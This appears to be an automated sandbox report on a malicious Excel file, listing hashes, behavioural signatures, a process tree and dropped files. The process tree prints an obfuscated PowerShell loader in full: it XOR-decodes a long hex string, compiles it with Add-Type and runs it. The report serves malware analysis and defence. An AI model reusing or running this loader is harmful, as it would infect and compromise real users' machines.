Analysis

  • max time kernel
    83s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    17/04/2023, 09:02

General

  • Target

    huh.xls

  • Size

    41KB

  • MD5

    78ef5cb007602678d321e656d262cc31

  • SHA1

    abde0acb2fa3a1f002bb138310fe9e180ffba279

  • SHA256

    8dec49167f634a101f631d4105b27a0e67fb7d2bd1cbd0105208965087a7b200

  • SHA512

    ec95acf6f396fd50fc802f3520a51624973492d310ab80fdac5a273ba6c3aee3cb9cfa66ef7ba47b0f80ac15f4799eb0d6358ef853f4150aaaafb25ac4832753

  • SSDEEP

    768:zPjk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJlpXd0HjW5ympvmoqG//pNQJ+q8b9t:rjk3hbdlylKsgqopeJBWhZFGkE+cL2NM

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 15 IoCs
  • Drops file in Windows directory 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\huh.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1932
  • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:676
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function wf59d8f {param($v5c68a)$zc8857='f8aa61';$b69b48='';for ($i=0; $i -lt $v5c68a.length;$i+=2){$l34c9a9=[convert]::ToByte($v5c68a.Substring($i,2),16);$b69b48+=[char]($l34c9a9 -bxor $zc8857[($i/2)%$zc8857.length]);}return $b69b48;}$tdd5855 = '134b080f511135411215535c5d4d12085856466b181242540b16331458450f55044f7f5f125d130e4662034a17085554150314125f5f01183218454503554f255f5001560e124258054b5a144558085f41324f42125d0c4f7f7e5d4d12085856466b181242540b162f04420a6b321114545d0f5b41025a50154b411153095f5953524d6a22540d285b41094a1549145a034a0f045a02541a4d2458451441310e5f5f120543265345364a0e027755024a041245134f651114545d0f5b41124250125102415349125d130f1678084c311544111559565557525310280f4261124a410e5457025e00501a42124a080f5111025d075904185d63250d5a780b480e1342194453041358540a0b53431a74084c1318665e0f56155c147d0959052d5f531459131814183b4814035a580518121557450f5b41044e45034a0f417f5f126815131645515a04580e024e4b15135f5f01180d0254525f0a485a6d750a54280c465e144c49435d541456040d05034414240f42431f680e0858455b1a3708444513590d31445e125d021514183b4814035a580518121557450f5b41044e45034a0f41545e0954410f5403505c56497f5f126815131652055a50541a642f5615314243465956575457510b4d145f5f1218115905545e094d0e4345464d080f4211170c5254550254115a3a725d0a710c1159431210432a5343085d0d52041f02540d431a74084c1318665e0f56155c146312542c0e40542b5d0c0e444844143204427d074b15244443094a5c07575d155d483c4545074c080216541e4c041358111057080516400059595507534e710f156645141812565555570c4d285845364c13414e065259524d5f5f121809020f505f0f485a46440454080216421259150855110f5615414c50525a505955194f43280f4261124a411401005201045c4206045d58590519115e54585209001043510104530953510e005e0d54515704521a48480d580010145607055f5d405c7f5f12681513186b034a0e484d78084c311544110a0056075203050512000105075b54494306570c58041a46000d58050e574e1a53560304570a51590004530a51560307540b50550301530f515202504411485a5f574e5459565055545b405c7f5f12681513186b034a0e484d642f56153142434640525654505b1034285845364c1348030a13510f151655550a57520b015d5107495853540e05561e5d5e0f070504524a40525654504a081955061d094d15415202540e52481f4a244115046d6c464b5052025253051a514e025714511950574a081958064c5d710f15664514180c025354050b5c2c57431550000d18700a540e027e760a5703005a1955115a2c57431550000d1872094818494500550c02541a014a5502045352551452480d400059595507534e5604161678084c311544190a00560752030516350e7f5f120e55491f1a5640515107534f140c025354050b4d521f0a1b451c1242430f56064144085f5a02040b74084e0813595f0b5d0f151876034c270e5a55034a310042594e7d0f175f4309560c045845486b110455580754270e5a55034a4f2046410a51020042580956250042504f184a41146d3a4e025304045f1a414a1646000d58050e574e1a555903555701515514185d5604161666035a220d5f54084c49481875094f0f0d5950027e080d5319115e54585209001043515305050954500705530803550f00510855510304040d59510e04020c07515004550c54550f04000851515504550c53550f04560954515504070d05550e040209585102134f1413580f53055d485a6643095b04124562125913157f5f0057411b5504515c05020b5f034f4131445e055d12126545074a15285857091013580f53055d485a6643095b0412451f354c001342191c5b5456525505115a135345134a0f41060a1b4814035a580518121557450f5b411242430f5606414157530105595019154c13085856465b545200055e00481a454514510f06165e045e050757005b1a075957505009435a454514510f061645515a04580e025b1a435a505e1410080f42110f05515a16585a5b545200055e004f2d535f014c095a5f1a5b0a481a5448125d41125706525902540b72095617044445486c0e234f450310025405075200594f6544044b15135f5f0110084d04184a0957480d45515a04580e024d0549025e5014114912570652590254685e045e050757003d10084e041843570307525707094f2d535f014c093c1f0a1b4a041543430818155654545f00525a4b4c';$tdd58552 = wf59d8f($tdd5855);Add-Type -TypeDefinition $tdd58552;[pe89a23]::za4b18c();
      2⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kt0mx4dq.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:324
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A06.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3A05.tmp"
          4⤵
            PID:1760

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

            Filesize

            240KB

            MD5

            9395e2fd9ca9b736eafd84b8a04e686c

            SHA1

            4beb0de54940b08b3b3b2ab57c12656475e8d449

            SHA256

            10924381a798eadfdd609575b74f274f8d4d1ad611ab01fb67704696a1e64279

            SHA512

            052d019bd46e71c416a2c4d5ee82777671988ec2b59bd2da89354cf42de2e7a98d99115dcebbd2271331b41045b9a59d57bcc77094647f6139a9323bd9c9bcb0

          • C:\Users\Admin\AppData\Local\Temp\RES3A06.tmp

            Filesize

            1KB

            MD5

            9cbc362bca9d57589552c9c5672fae47

            SHA1

            b743109a9da83609caca2ed270ba902b8c83c372

            SHA256

            2252a3ceb5d9bebe23f106505c37a63fbf0e78f73aef514e0abe626d9b4b9a87

            SHA512

            b5e6089f147d7dad90329c5a09229a5794fb08edb005ecd95e1b6e96bb7d08b8ae5ab0b979f04f7b564bb1b3cf2f7d1bd418186a7af38718452e750634cee0b6

          • C:\Users\Admin\AppData\Local\Temp\kt0mx4dq.dll

            Filesize

            5KB

            MD5

            0ef07db63ce61a81c341c7e6d1ad2a6f

            SHA1

            3daf8c915b64daf5bafb2d42c9133aa01d9bc200

            SHA256

            1a9f1359db651ee40d3094b5adc1a0808aae3277e37e858e4c19a024a5d04935

            SHA512

            7b4cb18788063c23fe2b061e9ab9bdfbaf2509dee57145717715f13afb1093cee95e86e784e8a0f39820252e09e2fb30bc4dfea8f52f5404116159a17a9fc80c

          • C:\Users\Admin\AppData\Local\Temp\kt0mx4dq.pdb

            Filesize

            11KB

            MD5

            e5a328f5145532d43c272489435349ae

            SHA1

            2b012ee912568a7c35a0d2cc8675e10c04b7a9a4

            SHA256

            03dfb00b5bd2234e5979bf7b71bdb657f38b67ec9683270106d530b82b374cc7

            SHA512

            b311976113afbaeec396edfe650c1217c4f9e4957a95949db8e89a4654dc7dee9c1942f8aafe3419d698025365bdc667db7988e487fa54011e3c98834385f3c9

          • \??\c:\Users\Admin\AppData\Local\Temp\CSC3A05.tmp

            Filesize

            652B

            MD5

            b760f3c4f11bc91e6df00da6b53a4281

            SHA1

            642577a35d139a58a267300f906b466a5ed42cf0

            SHA256

            0d3579b84845340687271764d6b4b2846da045ec1b60371736cd36f1ea628cf5

            SHA512

            9688de5bb00da43bc0e1fbd808ae9a57991689347ee963a6724c879888d809b7bbb87900e151b33ae53a1b3b3ab99bae24d39387af9436632b27fe57c272c3a7

          • \??\c:\Users\Admin\AppData\Local\Temp\kt0mx4dq.0.cs

            Filesize

            1KB

            MD5

            27f6b607e0e44b9188d08c2c037bf11f

            SHA1

            4468d894c16bb263cce0daba6c0680ce42549b9d

            SHA256

            ded2bc01a821bef56cac3847b4fc10739a52eefeed96f9e1427f3ec178ec1c99

            SHA512

            16541b67bf8a2895849c4421743763aed617adbcdb0bfc636d7400f350bdab4fb73f00ff8e630a80e32dce9d5791924413eaa5eb64f9c09fdbeaac5d1edf5079

          • \??\c:\Users\Admin\AppData\Local\Temp\kt0mx4dq.cmdline

            Filesize

            309B

            MD5

            e97d238c7a1e0d0c89354c98dfc3826c

            SHA1

            642aff01c20a88b0a34ef33b6507c9606924df0a

            SHA256

            5a4d8beacb8ecef574dd93919b83595f14751929b48ca23c9123ced0ec8456ca

            SHA512

            b1eac497678f9cbce09695dc681689b08d1ac56af3e0e8f2aceb99ba7c39a8ca57005da9e6c13a18c269e035a458caf6ec950154c4475e5b16f25d864f563b56

          • memory/1420-180-0x00000000026B0000-0x00000000026F0000-memory.dmp

            Filesize

            256KB

          • memory/1420-179-0x00000000026B0000-0x00000000026F0000-memory.dmp

            Filesize

            256KB

          • memory/1932-60-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-73-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-63-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-66-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-67-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-68-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-69-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-70-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-71-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-72-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-74-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-65-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-64-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-62-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1932-61-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-59-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-56-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-57-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-58-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB

          • memory/1932-55-0x00000000007D0000-0x00000000008D0000-memory.dmp

            Filesize

            1024KB